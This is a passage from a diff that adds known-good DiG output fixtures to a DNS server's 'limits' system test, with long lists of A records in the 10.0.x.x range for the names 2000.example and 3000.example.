10.0.5.252 +2000.example. 5M IN A 10.0.5.253 +2000.example. 5M IN A 10.0.5.254 +2000.example. 5M IN A 10.0.5.255 +2000.example. 5M IN A 10.0.6.0 +2000.example. 5M IN A 10.0.6.1 +2000.example. 5M IN A 10.0.6.2 +2000.example. 5M IN A 10.0.6.3 +2000.example. 5M IN A 10.0.6.4 +2000.example. 5M IN A 10.0.6.5 +2000.example. 5M IN A 10.0.6.6 +2000.example. 5M IN A 10.0.6.7 +2000.example. 5M IN A 10.0.6.8 +2000.example. 5M IN A 10.0.6.9 +2000.example. 5M IN A 10.0.6.10 +2000.example. 5M IN A 10.0.6.11 +2000.example. 5M IN A 10.0.6.12 +2000.example. 5M IN A 10.0.6.13 +2000.example. 5M IN A 10.0.6.14 +2000.example. 5M IN A 10.0.6.15 +2000.example. 5M IN A 10.0.6.16 +2000.example. 5M IN A 10.0.6.17 +2000.example. 5M IN A 10.0.6.18 +2000.example. 5M IN A 10.0.6.19 +2000.example. 5M IN A 10.0.6.20 +2000.example. 5M IN A 10.0.6.21 +2000.example. 5M IN A 10.0.6.22 +2000.example. 5M IN A 10.0.6.23 +2000.example. 5M IN A 10.0.6.24 +2000.example. 5M IN A 10.0.6.25 +2000.example. 5M IN A 10.0.6.26 +2000.example. 5M IN A 10.0.6.27 +2000.example. 5M IN A 10.0.6.28 +2000.example. 5M IN A 10.0.6.29 +2000.example. 5M IN A 10.0.6.30 +2000.example. 5M IN A 10.0.6.31 +2000.example. 5M IN A 10.0.6.32 +2000.example. 5M IN A 10.0.6.33 +2000.example. 5M IN A 10.0.6.34 +2000.example. 5M IN A 10.0.6.35 +2000.example. 5M IN A 10.0.6.36 +2000.example. 5M IN A 10.0.6.37 +2000.example. 5M IN A 10.0.6.38 +2000.example. 5M IN A 10.0.6.39 +2000.example. 5M IN A 10.0.6.40 +2000.example. 5M IN A 10.0.6.41 +2000.example. 5M IN A 10.0.6.42 +2000.example. 5M IN A 10.0.6.43 +2000.example. 5M IN A 10.0.6.44 +2000.example. 5M IN A 10.0.6.45 +2000.example. 5M IN A 10.0.6.46 +2000.example. 5M IN A 10.0.6.47 +2000.example. 5M IN A 10.0.6.48 +2000.example. 5M IN A 10.0.6.49 +2000.example. 5M IN A 10.0.6.50 +2000.example. 5M IN A 10.0.6.51 +2000.example. 5M IN A 10.0.6.52 +2000.example. 5M IN A 10.0.6.53 +2000.example. 5M IN A 10.0.6.54 +2000.example. 5M IN A 10.0.6.55 +2000.example. 5M IN A 10.0.6.56 +2000.example. 5M IN A 10.0.6.57 +2000.example. 5M IN A 10.0.6.58 +2000.example. 5M IN A 10.0.6.59 +2000.example. 5M IN A 10.0.6.60 +2000.example. 5M IN A 10.0.6.61 +2000.example. 5M IN A 10.0.6.62 +2000.example. 5M IN A 10.0.6.63 +2000.example. 5M IN A 10.0.6.64 +2000.example. 5M IN A 10.0.6.65 +2000.example. 5M IN A 10.0.6.66 +2000.example. 5M IN A 10.0.6.67 +2000.example. 5M IN A 10.0.6.68 +2000.example. 5M IN A 10.0.6.69 +2000.example. 5M IN A 10.0.6.70 +2000.example. 5M IN A 10.0.6.71 +2000.example. 5M IN A 10.0.6.72 +2000.example. 5M IN A 10.0.6.73 +2000.example. 5M IN A 10.0.6.74 +2000.example. 5M IN A 10.0.6.75 +2000.example. 5M IN A 10.0.6.76 +2000.example. 5M IN A 10.0.6.77 +2000.example. 5M IN A 10.0.6.78 +2000.example. 5M IN A 10.0.6.79 +2000.example. 5M IN A 10.0.6.80 +2000.example. 5M IN A 10.0.6.81 +2000.example. 5M IN A 10.0.6.82 +2000.example. 5M IN A 10.0.6.83 +2000.example. 5M IN A 10.0.6.84 +2000.example. 5M IN A 10.0.6.85 +2000.example. 5M IN A 10.0.6.86 +2000.example. 5M IN A 10.0.6.87 +2000.example. 5M IN A 10.0.6.88 +2000.example. 5M IN A 10.0.6.89 +2000.example. 5M IN A 10.0.6.90 +2000.example. 5M IN A 10.0.6.91 +2000.example. 5M IN A 10.0.6.92 +2000.example. 5M IN A 10.0.6.93 +2000.example. 5M IN A 10.0.6.94 +2000.example. 5M IN A 10.0.6.95 +2000.example. 5M IN A 10.0.6.96 +2000.example. 5M IN A 10.0.6.97 +2000.example. 5M IN A 10.0.6.98 +2000.example. 5M IN A 10.0.6.99 +2000.example. 5M IN A 10.0.6.100 +2000.example. 5M IN A 10.0.6.101 +2000.example. 5M IN A 10.0.6.102 +2000.example. 5M IN A 10.0.6.103 +2000.example. 5M IN A 10.0.6.104 +2000.example. 5M IN A 10.0.6.105 +2000.example. 5M IN A 10.0.6.106 +2000.example. 5M IN A 10.0.6.107 +2000.example. 5M IN A 10.0.6.108 +2000.example. 5M IN A 10.0.6.109 +2000.example. 5M IN A 10.0.6.110 +2000.example. 5M IN A 10.0.6.111 +2000.example. 5M IN A 10.0.6.112 +2000.example. 5M IN A 10.0.6.113 +2000.example. 5M IN A 10.0.6.114 +2000.example. 5M IN A 10.0.6.115 +2000.example. 5M IN A 10.0.6.116 +2000.example. 5M IN A 10.0.6.117 +2000.example. 5M IN A 10.0.6.118 +2000.example. 5M IN A 10.0.6.119 +2000.example. 5M IN A 10.0.6.120 +2000.example. 5M IN A 10.0.6.121 +2000.example. 5M IN A 10.0.6.122 +2000.example. 5M IN A 10.0.6.123 +2000.example. 5M IN A 10.0.6.124 +2000.example. 5M IN A 10.0.6.125 +2000.example. 5M IN A 10.0.6.126 +2000.example. 5M IN A 10.0.6.127 +2000.example. 5M IN A 10.0.6.128 +2000.example. 5M IN A 10.0.6.129 +2000.example. 5M IN A 10.0.6.130 +2000.example. 5M IN A 10.0.6.131 +2000.example. 5M IN A 10.0.6.132 +2000.example. 5M IN A 10.0.6.133 +2000.example. 5M IN A 10.0.6.134 +2000.example. 5M IN A 10.0.6.135 +2000.example. 5M IN A 10.0.6.136 +2000.example. 5M IN A 10.0.6.137 +2000.example. 5M IN A 10.0.6.138 +2000.example. 5M IN A 10.0.6.139 +2000.example. 5M IN A 10.0.6.140 +2000.example. 5M IN A 10.0.6.141 +2000.example. 5M IN A 10.0.6.142 +2000.example. 5M IN A 10.0.6.143 +2000.example. 5M IN A 10.0.6.144 +2000.example. 5M IN A 10.0.6.145 +2000.example. 5M IN A 10.0.6.146 +2000.example. 5M IN A 10.0.6.147 +2000.example. 5M IN A 10.0.6.148 +2000.example. 5M IN A 10.0.6.149 +2000.example. 5M IN A 10.0.6.150 +2000.example. 5M IN A 10.0.6.151 +2000.example. 5M IN A 10.0.6.152 +2000.example. 5M IN A 10.0.6.153 +2000.example. 5M IN A 10.0.6.154 +2000.example. 5M IN A 10.0.6.155 +2000.example. 5M IN A 10.0.6.156 +2000.example. 5M IN A 10.0.6.157 +2000.example. 5M IN A 10.0.6.158 +2000.example. 5M IN A 10.0.6.159 +2000.example. 5M IN A 10.0.6.160 +2000.example. 5M IN A 10.0.6.161 +2000.example. 5M IN A 10.0.6.162 +2000.example. 5M IN A 10.0.6.163 +2000.example. 5M IN A 10.0.6.164 +2000.example. 5M IN A 10.0.6.165 +2000.example. 5M IN A 10.0.6.166 +2000.example. 5M IN A 10.0.6.167 +2000.example. 5M IN A 10.0.6.168 +2000.example. 5M IN A 10.0.6.169 +2000.example. 5M IN A 10.0.6.170 +2000.example. 5M IN A 10.0.6.171 +2000.example. 5M IN A 10.0.6.172 +2000.example. 5M IN A 10.0.6.173 +2000.example. 5M IN A 10.0.6.174 +2000.example. 5M IN A 10.0.6.175 +2000.example. 5M IN A 10.0.6.176 +2000.example. 5M IN A 10.0.6.177 +2000.example. 5M IN A 10.0.6.178 +2000.example. 5M IN A 10.0.6.179 +2000.example. 5M IN A 10.0.6.180 +2000.example. 5M IN A 10.0.6.181 +2000.example. 5M IN A 10.0.6.182 +2000.example. 5M IN A 10.0.6.183 +2000.example. 5M IN A 10.0.6.184 +2000.example. 5M IN A 10.0.6.185 +2000.example. 5M IN A 10.0.6.186 +2000.example. 5M IN A 10.0.6.187 +2000.example. 5M IN A 10.0.6.188 +2000.example. 5M IN A 10.0.6.189 +2000.example. 5M IN A 10.0.6.190 +2000.example. 5M IN A 10.0.6.191 +2000.example. 5M IN A 10.0.6.192 +2000.example. 5M IN A 10.0.6.193 +2000.example. 5M IN A 10.0.6.194 +2000.example. 5M IN A 10.0.6.195 +2000.example. 5M IN A 10.0.6.196 +2000.example. 5M IN A 10.0.6.197 +2000.example. 5M IN A 10.0.6.198 +2000.example. 5M IN A 10.0.6.199 +2000.example. 5M IN A 10.0.6.200 +2000.example. 5M IN A 10.0.6.201 +2000.example. 5M IN A 10.0.6.202 +2000.example. 5M IN A 10.0.6.203 +2000.example. 5M IN A 10.0.6.204 +2000.example. 5M IN A 10.0.6.205 +2000.example. 5M IN A 10.0.6.206 +2000.example. 5M IN A 10.0.6.207 +2000.example. 5M IN A 10.0.6.208 +2000.example. 5M IN A 10.0.6.209 +2000.example. 5M IN A 10.0.6.210 +2000.example. 5M IN A 10.0.6.211 +2000.example. 5M IN A 10.0.6.212 +2000.example. 5M IN A 10.0.6.213 +2000.example. 5M IN A 10.0.6.214 +2000.example. 5M IN A 10.0.6.215 +2000.example. 5M IN A 10.0.6.216 +2000.example. 5M IN A 10.0.6.217 +2000.example. 5M IN A 10.0.6.218 +2000.example. 5M IN A 10.0.6.219 +2000.example. 5M IN A 10.0.6.220 +2000.example. 5M IN A 10.0.6.221 +2000.example. 5M IN A 10.0.6.222 +2000.example. 5M IN A 10.0.6.223 +2000.example. 5M IN A 10.0.6.224 +2000.example. 5M IN A 10.0.6.225 +2000.example. 5M IN A 10.0.6.226 +2000.example. 5M IN A 10.0.6.227 +2000.example. 5M IN A 10.0.6.228 +2000.example. 5M IN A 10.0.6.229 +2000.example. 5M IN A 10.0.6.230 +2000.example. 5M IN A 10.0.6.231 +2000.example. 5M IN A 10.0.6.232 +2000.example. 5M IN A 10.0.6.233 +2000.example. 5M IN A 10.0.6.234 +2000.example. 5M IN A 10.0.6.235 +2000.example. 5M IN A 10.0.6.236 +2000.example. 5M IN A 10.0.6.237 +2000.example. 5M IN A 10.0.6.238 +2000.example. 5M IN A 10.0.6.239 +2000.example. 5M IN A 10.0.6.240 +2000.example. 5M IN A 10.0.6.241 +2000.example. 5M IN A 10.0.6.242 +2000.example. 5M IN A 10.0.6.243 +2000.example. 5M IN A 10.0.6.244 +2000.example. 5M IN A 10.0.6.245 +2000.example. 5M IN A 10.0.6.246 +2000.example. 5M IN A 10.0.6.247 +2000.example. 5M IN A 10.0.6.248 +2000.example. 5M IN A 10.0.6.249 +2000.example. 5M IN A 10.0.6.250 +2000.example. 5M IN A 10.0.6.251 +2000.example. 5M IN A 10.0.6.252 +2000.example. 5M IN A 10.0.6.253 +2000.example. 5M IN A 10.0.6.254 +2000.example. 5M IN A 10.0.6.255 +2000.example. 5M IN A 10.0.7.0 +2000.example. 5M IN A 10.0.7.1 +2000.example. 5M IN A 10.0.7.2 +2000.example. 5M IN A 10.0.7.3 +2000.example. 5M IN A 10.0.7.4 +2000.example. 5M IN A 10.0.7.5 +2000.example. 5M IN A 10.0.7.6 +2000.example. 5M IN A 10.0.7.7 +2000.example. 5M IN A 10.0.7.8 +2000.example. 5M IN A 10.0.7.9 +2000.example. 5M IN A 10.0.7.10 +2000.example. 5M IN A 10.0.7.11 +2000.example. 5M IN A 10.0.7.12 +2000.example. 5M IN A 10.0.7.13 +2000.example. 5M IN A 10.0.7.14 +2000.example. 5M IN A 10.0.7.15 +2000.example. 5M IN A 10.0.7.16 +2000.example. 5M IN A 10.0.7.17 +2000.example. 5M IN A 10.0.7.18 +2000.example. 5M IN A 10.0.7.19 +2000.example. 5M IN A 10.0.7.20 +2000.example. 5M IN A 10.0.7.21 +2000.example. 5M IN A 10.0.7.22 +2000.example. 5M IN A 10.0.7.23 +2000.example. 5M IN A 10.0.7.24 +2000.example. 5M IN A 10.0.7.25 +2000.example. 5M IN A 10.0.7.26 +2000.example. 5M IN A 10.0.7.27 +2000.example. 5M IN A 10.0.7.28 +2000.example. 5M IN A 10.0.7.29 +2000.example. 5M IN A 10.0.7.30 +2000.example. 5M IN A 10.0.7.31 +2000.example. 5M IN A 10.0.7.32 +2000.example. 5M IN A 10.0.7.33 +2000.example. 5M IN A 10.0.7.34 +2000.example. 5M IN A 10.0.7.35 +2000.example. 5M IN A 10.0.7.36 +2000.example. 5M IN A 10.0.7.37 +2000.example. 5M IN A 10.0.7.38 +2000.example. 5M IN A 10.0.7.39 +2000.example. 5M IN A 10.0.7.40 +2000.example. 5M IN A 10.0.7.41 +2000.example. 5M IN A 10.0.7.42 +2000.example. 5M IN A 10.0.7.43 +2000.example. 5M IN A 10.0.7.44 +2000.example. 5M IN A 10.0.7.45 +2000.example. 5M IN A 10.0.7.46 +2000.example. 5M IN A 10.0.7.47 +2000.example. 5M IN A 10.0.7.48 +2000.example. 5M IN A 10.0.7.49 +2000.example. 5M IN A 10.0.7.50 +2000.example. 5M IN A 10.0.7.51 +2000.example. 5M IN A 10.0.7.52 +2000.example. 5M IN A 10.0.7.53 +2000.example. 5M IN A 10.0.7.54 +2000.example. 5M IN A 10.0.7.55 +2000.example. 5M IN A 10.0.7.56 +2000.example. 5M IN A 10.0.7.57 +2000.example. 5M IN A 10.0.7.58 +2000.example. 5M IN A 10.0.7.59 +2000.example. 5M IN A 10.0.7.60 +2000.example. 5M IN A 10.0.7.61 +2000.example. 5M IN A 10.0.7.62 +2000.example. 5M IN A 10.0.7.63 +2000.example. 5M IN A 10.0.7.64 +2000.example. 5M IN A 10.0.7.65 +2000.example. 5M IN A 10.0.7.66 +2000.example. 5M IN A 10.0.7.67 +2000.example. 5M IN A 10.0.7.68 +2000.example. 5M IN A 10.0.7.69 +2000.example. 5M IN A 10.0.7.70 +2000.example. 5M IN A 10.0.7.71 +2000.example. 5M IN A 10.0.7.72 +2000.example. 5M IN A 10.0.7.73 +2000.example. 5M IN A 10.0.7.74 +2000.example. 5M IN A 10.0.7.75 +2000.example. 5M IN A 10.0.7.76 +2000.example. 5M IN A 10.0.7.77 +2000.example. 5M IN A 10.0.7.78 +2000.example. 5M IN A 10.0.7.79 +2000.example. 5M IN A 10.0.7.80 +2000.example. 5M IN A 10.0.7.81 +2000.example. 5M IN A 10.0.7.82 +2000.example. 5M IN A 10.0.7.83 +2000.example. 5M IN A 10.0.7.84 +2000.example. 5M IN A 10.0.7.85 +2000.example. 5M IN A 10.0.7.86 +2000.example. 5M IN A 10.0.7.87 +2000.example. 5M IN A 10.0.7.88 +2000.example. 5M IN A 10.0.7.89 +2000.example. 5M IN A 10.0.7.90 +2000.example. 5M IN A 10.0.7.91 +2000.example. 5M IN A 10.0.7.92 +2000.example. 5M IN A 10.0.7.93 +2000.example. 5M IN A 10.0.7.94 +2000.example. 5M IN A 10.0.7.95 +2000.example. 5M IN A 10.0.7.96 +2000.example. 5M IN A 10.0.7.97 +2000.example. 5M IN A 10.0.7.98 +2000.example. 5M IN A 10.0.7.99 +2000.example. 5M IN A 10.0.7.100 +2000.example. 5M IN A 10.0.7.101 +2000.example. 5M IN A 10.0.7.102 +2000.example. 5M IN A 10.0.7.103 +2000.example. 5M IN A 10.0.7.104 +2000.example. 5M IN A 10.0.7.105 +2000.example. 5M IN A 10.0.7.106 +2000.example. 5M IN A 10.0.7.107 +2000.example. 5M IN A 10.0.7.108 +2000.example. 5M IN A 10.0.7.109 +2000.example. 5M IN A 10.0.7.110 +2000.example. 5M IN A 10.0.7.111 +2000.example. 5M IN A 10.0.7.112 +2000.example. 5M IN A 10.0.7.113 +2000.example. 5M IN A 10.0.7.114 +2000.example. 5M IN A 10.0.7.115 +2000.example. 5M IN A 10.0.7.116 +2000.example. 5M IN A 10.0.7.117 +2000.example. 5M IN A 10.0.7.118 +2000.example. 5M IN A 10.0.7.119 +2000.example. 5M IN A 10.0.7.120 +2000.example. 5M IN A 10.0.7.121 +2000.example. 5M IN A 10.0.7.122 +2000.example. 5M IN A 10.0.7.123 +2000.example. 5M IN A 10.0.7.124 +2000.example. 5M IN A 10.0.7.125 +2000.example. 5M IN A 10.0.7.126 +2000.example. 5M IN A 10.0.7.127 +2000.example. 5M IN A 10.0.7.128 +2000.example. 5M IN A 10.0.7.129 +2000.example. 5M IN A 10.0.7.130 +2000.example. 5M IN A 10.0.7.131 +2000.example. 5M IN A 10.0.7.132 +2000.example. 5M IN A 10.0.7.133 +2000.example. 5M IN A 10.0.7.134 +2000.example. 5M IN A 10.0.7.135 +2000.example. 5M IN A 10.0.7.136 +2000.example. 5M IN A 10.0.7.137 +2000.example. 5M IN A 10.0.7.138 +2000.example. 5M IN A 10.0.7.139 +2000.example. 5M IN A 10.0.7.140 +2000.example. 5M IN A 10.0.7.141 +2000.example. 5M IN A 10.0.7.142 +2000.example. 5M IN A 10.0.7.143 +2000.example. 5M IN A 10.0.7.144 +2000.example. 5M IN A 10.0.7.145 +2000.example. 5M IN A 10.0.7.146 +2000.example. 5M IN A 10.0.7.147 +2000.example. 5M IN A 10.0.7.148 +2000.example. 5M IN A 10.0.7.149 +2000.example. 5M IN A 10.0.7.150 +2000.example. 5M IN A 10.0.7.151 +2000.example. 5M IN A 10.0.7.152 +2000.example. 5M IN A 10.0.7.153 +2000.example. 5M IN A 10.0.7.154 +2000.example. 5M IN A 10.0.7.155 +2000.example. 5M IN A 10.0.7.156 +2000.example. 5M IN A 10.0.7.157 +2000.example. 5M IN A 10.0.7.158 +2000.example. 5M IN A 10.0.7.159 +2000.example. 5M IN A 10.0.7.160 +2000.example. 5M IN A 10.0.7.161 +2000.example. 5M IN A 10.0.7.162 +2000.example. 5M IN A 10.0.7.163 +2000.example. 5M IN A 10.0.7.164 +2000.example. 5M IN A 10.0.7.165 +2000.example. 5M IN A 10.0.7.166 +2000.example. 5M IN A 10.0.7.167 +2000.example. 5M IN A 10.0.7.168 +2000.example. 5M IN A 10.0.7.169 +2000.example. 5M IN A 10.0.7.170 +2000.example. 5M IN A 10.0.7.171 +2000.example. 5M IN A 10.0.7.172 +2000.example. 5M IN A 10.0.7.173 +2000.example. 5M IN A 10.0.7.174 +2000.example. 5M IN A 10.0.7.175 +2000.example. 5M IN A 10.0.7.176 +2000.example. 5M IN A 10.0.7.177 +2000.example. 5M IN A 10.0.7.178 +2000.example. 5M IN A 10.0.7.179 +2000.example. 5M IN A 10.0.7.180 +2000.example. 5M IN A 10.0.7.181 +2000.example. 5M IN A 10.0.7.182 +2000.example. 5M IN A 10.0.7.183 +2000.example. 5M IN A 10.0.7.184 +2000.example. 5M IN A 10.0.7.185 +2000.example. 5M IN A 10.0.7.186 +2000.example. 5M IN A 10.0.7.187 +2000.example. 5M IN A 10.0.7.188 +2000.example. 5M IN A 10.0.7.189 +2000.example. 5M IN A 10.0.7.190 +2000.example. 5M IN A 10.0.7.191 +2000.example. 5M IN A 10.0.7.192 +2000.example. 5M IN A 10.0.7.193 +2000.example. 5M IN A 10.0.7.194 +2000.example. 5M IN A 10.0.7.195 +2000.example. 5M IN A 10.0.7.196 +2000.example. 5M IN A 10.0.7.197 +2000.example. 5M IN A 10.0.7.198 +2000.example. 5M IN A 10.0.7.199 +2000.example. 5M IN A 10.0.7.200 +2000.example. 5M IN A 10.0.7.201 +2000.example. 5M IN A 10.0.7.202 +2000.example. 5M IN A 10.0.7.203 +2000.example. 5M IN A 10.0.7.204 +2000.example. 5M IN A 10.0.7.205 +2000.example. 5M IN A 10.0.7.206 +2000.example. 5M IN A 10.0.7.207 + +;; AUTHORITY SECTION: +example. 5M IN NS ns1.example. + +;; ADDITIONAL SECTION: +ns1.example. 5M IN A 10.53.0.1 + +;; Total query time: 121 msec +;; FROM: draco to SERVER: 10.53.0.1 +;; WHEN: Fri Jun 23 12:58:14 2000 +;; MSG SIZE sent: 30 rcvd: 32068 + diff --git a/bin/tests/system/limits/knowngood.dig.out.3000 b/bin/tests/system/limits/knowngood.dig.out.3000 new file mode 100644 index 0000000..1932475 --- /dev/null +++ b/bin/tests/system/limits/knowngood.dig.out.3000 @@ -0,0 +1,3023 @@ + +; <<>> DiG 8.2 <<>> 3000.example. @10.53.0.1 a -p +; (1 server found) +;; res options: init recurs defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 +;; flags: qr aa rd ad; QUERY: 1, ANSWER: 3000, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; 3000.example, type = A, class = IN + +;; ANSWER SECTION: +3000.example. 5M IN A 10.0.0.0 +3000.example. 5M IN A 10.0.0.1 +3000.example. 5M IN A 10.0.0.2 +3000.example. 5M IN A 10.0.0.3 +3000.example. 5M IN A 10.0.0.4 +3000.example. 5M IN A 10.0.0.5 +3000.example. 5M IN A 10.0.0.6 +3000.example. 5M IN A 10.0.0.7 +3000.example. 5M IN A 10.0.0.8 +3000.example. 5M IN A 10.0.0.9 +3000.example. 5M IN A 10.0.0.10 +3000.example. 5M IN A 10.0.0.11 +3000.example. 5M IN A 10.0.0.12 +3000.example. 5M IN A 10.0.0.13 +3000.example. 5M IN A 10.0.0.14 +3000.example. 5M IN A 10.0.0.15 +3000.example. 5M IN A 10.0.0.16 +3000.example. 5M IN A 10.0.0.17 +3000.example. 5M IN A 10.0.0.18 +3000.example. 5M IN A 10.0.0.19 +3000.example. 5M IN A 10.0.0.20 +3000.example. 5M IN A 10.0.0.21 +3000.example. 5M IN A 10.0.0.22 +3000.example. 5M IN A 10.0.0.23 +3000.example. 5M IN A 10.0.0.24 +3000.example. 5M IN A 10.0.0.25 +3000.example. 5M IN A 10.0.0.26 +3000.example. 5M IN A 10.0.0.27 +3000.example. 5M IN A 10.0.0.28 +3000.example. 5M IN A 10.0.0.29 +3000.example. 5M IN A 10.0.0.30 +3000.example. 5M IN A 10.0.0.31 +3000.example. 5M IN A 10.0.0.32 +3000.example. 5M IN A 10.0.0.33 +3000.example. 5M IN A 10.0.0.34 +3000.example. 5M IN A 10.0.0.35 +3000.example. 5M IN A 10.0.0.36 +3000.example. 5M IN A 10.0.0.37 +3000.example. 5M IN A 10.0.0.38 +3000.example. 5M IN A 10.0.0.39 +3000.example. 5M IN A 10.0.0.40 +3000.example. 5M IN A 10.0.0.41 +3000.example. 5M IN A 10.0.0.42 +3000.example. 5M IN A 10.0.0.43 +3000.example. 5M IN A 10.0.0.44 +3000.example. 5M IN A 10.0.0.45 +3000.example. 5M IN A 10.0.0.46 +3000.example. 5M IN A 10.0.0.47 +3000.example. 5M IN A 10.0.0.48 +3000.example. 5M IN A 10.0.0.49 +3000.example. 5M IN A 10.0.0.50 +3000.example. 5M IN A 10.0.0.51 +3000.example. 5M IN A 10.0.0.52 +3000.example. 5M IN A 10.0.0.53 +3000.example. 5M IN A 10.0.0.54 +3000.example. 5M IN A 10.0.0.55 +3000.example. 5M IN A 10.0.0.56 +3000.example. 5M IN A 10.0.0.57 +3000.example. 5M IN A 10.0.0.58 +3000.example. 5M IN A 10.0.0.59 +3000.example. 5M IN A 10.0.0.60 +3000.example. 5M IN A 10.0.0.61 +3000.example. 5M IN A 10.0.0.62 +3000.example. 5M IN A 10.0.0.63 +3000.example. 5M IN A 10.0.0.64 +3000.example. 5M IN A 10.0.0.65 +3000.example. 5M IN A 10.0.0.66 +3000.example. 5M IN A 10.0.0.67 +3000.example. 5M IN A 10.0.0.68 +3000.example. 5M IN A 10.0.0.69 +3000.example. 5M IN A 10.0.0.70 +3000.example. 5M IN A 10.0.0.71 +3000.example. 5M IN A 10.0.0.72 +3000.example. 5M IN A 10.0.0.73 +3000.example. 5M IN A 10.0.0.74 +3000.example. 5M IN A 10.0.0.75 +3000.example. 5M IN A 10.0.0.76 +3000.example. 5M IN A 10.0.0.77 +3000.example. 5M IN A 10.0.0.78 +3000.example. 5M IN A 10.0.0.79 +3000.example. 5M IN A 10.0.0.80 +3000.example. 5M IN A 10.0.0.81 +3000.example. 5M IN A 10.0.0.82 +3000.example. 5M IN A 10.0.0.83 +3000.example. 5M IN A 10.0.0.84 +3000.example. 5M IN A 10.0.0.85 +3000.example. 5M IN A 10.0.0.86 +3000.example. 5M IN A 10.0.0.87 +3000.example. 5M IN A 10.0.0.88 +3000.example. 5M IN A 10.0.0.89 +3000.example. 5M IN A 10.0.0.90 +3000.example. 5M IN A 10.0.0.91 +3000.example. 5M IN A 10.0.0.92 +3000.example. 5M IN A 10.0.0.93 +3000.example. 5M IN A 10.0.0.94 +3000.example. 5M IN A 10.0.0.95 +3000.example. 5M IN A 10.0.0.96 +3000.example. 5M IN A 10.0.0.97 +3000.example. 5M IN A 10.0.0.98 +3000.example. 5M IN A 10.0.0.99 +3000.example. 5M IN A 10.0.0.100 +3000.example. 5M IN A 10.0.0.101 +3000.example. 5M IN A 10.0.0.102 +3000.example. 5M IN A 10.0.0.103 +3000.example. 5M IN A 10.0.0.104 +3000.example. 5M IN A 10.0.0.105 +3000.example. 5M IN A 10.0.0.106 +3000.example. 5M IN A 10.0.0.107 +3000.example. 5M IN A 10.0.0.108 +3000.example. 5M IN A 10.0.0.109 +3000.example. 5M IN A 10.0.0.110 +3000.example. 5M IN A 10.0.0.111 +3000.example. 5M IN A 10.0.0.112 +3000.example. 5M IN A 10.0.0.113 +3000.example. 5M IN A 10.0.0.114 +3000.example. 5M IN A 10.0.0.115 +3000.example. 5M IN A 10.0.0.116 +3000.example. 5M IN A 10.0.0.117 +3000.example. 5M IN A 10.0.0.118 +3000.example. 5M IN A 10.0.0.119 +3000.example. 5M IN A 10.0.0.120 +3000.example. 5M IN A 10.0.0.121 +3000.example. 5M IN A 10.0.0.122 +3000.example. 5M IN A 10.0.0.123 +3000.example. 5M IN A 10.0.0.124 +3000.example. 5M IN A 10.0.0.125 +3000.example. 5M IN A 10.0.0.126 +3000.example. 5M IN A 10.0.0.127 +3000.example. 5M IN A 10.0.0.128 +3000.example. 5M IN A 10.0.0.129 +3000.example. 5M IN A 10.0.0.130 +3000.example. 5M IN A 10.0.0.131 +3000.example. 5M IN A 10.0.0.132 +3000.example. 5M IN A 10.0.0.133 +3000.example. 5M IN A 10.0.0.134 +3000.example. 5M IN A 10.0.0.135 +3000.example. 5M IN A 10.0.0.136 +3000.example. 5M IN A 10.0.0.137 +3000.example. 5M IN A 10.0.0.138 +3000.example. 5M IN A 10.0.0.139 +3000.example. 5M IN A 10.0.0.140 +3000.example. 5M IN A 10.0.0.141 +3000.example. 5M IN A 10.0.0.142 +3000.example. 5M IN A 10.0.0.143 +3000.example. 5M IN A 10.0.0.144 +3000.example. 5M IN A 10.0.0.145 +3000.example. 5M IN A 10.0.0.146 +3000.example. 5M IN A 10.0.0.147 +3000.example. 5M IN A 10.0.0.148 +3000.example. 5M IN A 10.0.0.149 +3000.example. 5M IN A 10.0.0.150 +3000.example. 5M IN A 10.0.0.151 +3000.example. 5M IN A 10.0.0.152 +3000.example. 5M IN A 10.0.0.153 +3000.example. 5M IN A 10.0.0.154 +3000.example. 5M IN A 10.0.0.155 +3000.example. 5M IN A 10.0.0.156 +3000.example. 5M IN A 10.0.0.157 +3000.example. 5M IN A 10.0.0.158 +3000.example. 5M IN A 10.0.0.159 +3000.example. 5M IN A 10.0.0.160 +3000.example. 5M IN A 10.0.0.161 +3000.example. 5M IN A 10.0.0.162 +3000.example. 5M IN A 10.0.0.163 +3000.example. 5M IN A 10.0.0.164 +3000.example. 5M IN A 10.0.0.165 +3000.example. 5M IN A 10.0.0.166 +3000.example. 5M IN A 10.0.0.167 +3000.example. 5M IN A 10.0.0.168 +3000.example. 5M IN A 10.0.0.169 +3000.example. 5M IN A 10.0.0.170 +3000.example. 5M IN A 10.0.0.171 +3000.example. 5M IN A 10.0.0.172 +3000.example. 5M IN A 10.0.0.173 +3000.example. 5M IN A 10.0.0.174 +3000.example. 5M IN A 10.0.0.175 +3000.example. 5M IN A 10.0.0.176 +3000.example. 5M IN A 10.0.0.177 +3000.example. 5M IN A 10.0.0.178 +3000.example. 5M IN A 10.0.0.179 +3000.example. 5M IN A 10.0.0.180 +3000.example. 5M IN A 10.0.0.181 +3000.example. 5M IN A 10.0.0.182 +3000.example. 5M IN A 10.0.0.183 +3000.example. 5M IN A 10.0.0.184 +3000.example. 5M IN A 10.0.0.185 +3000.example. 5M IN A 10.0.0.186 +3000.example. 5M IN A 10.0.0.187 +3000.example. 5M IN A 10.0.0.188 +3000.example. 5M IN A 10.0.0.189 +3000.example. 5M IN A 10.0.0.190 +3000.example. 5M IN A 10.0.0.191 +3000.example. 5M IN A 10.0.0.192 +3000.example. 5M IN A 10.0.0.193 +3000.example. 5M IN A 10.0.0.194 +3000.example. 5M IN A 10.0.0.195 +3000.example. 5M IN A 10.0.0.196 +3000.example. 5M IN A 10.0.0.197 +3000.example. 5M IN A 10.0.0.198 +3000.example. 5M IN A 10.0.0.199 +3000.example. 5M IN A 10.0.0.200 +3000.example. 5M IN A 10.0.0.201 +3000.example. 5M IN A 10.0.0.202 +3000.example. 5M IN A 10.0.0.203 +3000.example. 5M IN A 10.0.0.204 +3000.example. 5M IN A 10.0.0.205 +3000.example. 5M IN A 10.0.0.206 +3000.example. 5M IN A 10.0.0.207 +3000.example. 5M IN A 10.0.0.208 +3000.example. 5M IN A 10.0.0.209 +3000.example. 5M IN A 10.0.0.210 +3000.example. 5M IN A 10.0.0.211 +3000.example. 5M IN A 10.0.0.212 +3000.example. 5M IN A 10.0.0.213 +3000.example. 5M IN A 10.0.0.214 +3000.example. 5M IN A 10.0.0.215 +3000.example. 5M IN A 10.0.0.216 +3000.example. 5M IN A 10.0.0.217 +3000.example. 5M IN A 10.0.0.218 +3000.example. 5M IN A 10.0.0.219 +3000.example. 5M IN A 10.0.0.220 +3000.example. 5M IN A 10.0.0.221 +3000.example. 5M IN A 10.0.0.222 +3000.example. 5M 